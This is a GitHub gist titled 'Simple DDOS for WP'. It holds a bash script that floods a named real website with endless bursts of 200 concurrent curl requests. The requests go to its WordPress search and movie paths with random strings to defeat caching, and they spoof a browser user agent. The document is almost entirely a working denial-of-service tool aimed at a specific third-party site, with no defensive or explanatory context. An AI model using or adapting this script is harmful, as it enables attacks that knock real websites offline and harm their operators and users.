Skip to content

Instantly share code, notes, and snippets.

@fedek6
Created May 6, 2021 08:27
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save fedek6/ddea303a83fe6b8f42565e44f7a52a19 to your computer and use it in GitHub Desktop.
Save fedek6/ddea303a83fe6b8f42565e44f7a52a19 to your computer and use it in GitHub Desktop.
Simple DDOS for WP
#!/bin/bash
while :
do
echo "Press [CTRL+C] to stop..."
URL=$(cat /dev/urandom | env LC_CTYPE=C tr -dc a-zA-Z0-9 | head -c 16; echo)
for i in {1..100}
do
curl https://goldenliine.pl/?s=$URL --max-time 2 -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.89 Safari/537.36" &> /dev/null &
curl https://goldenliine.pl/movies/$URL --max-time 2 -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.89 Safari/537.36" &> /dev/null &
done
echo $URL
echo next!
sleep 2
done
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment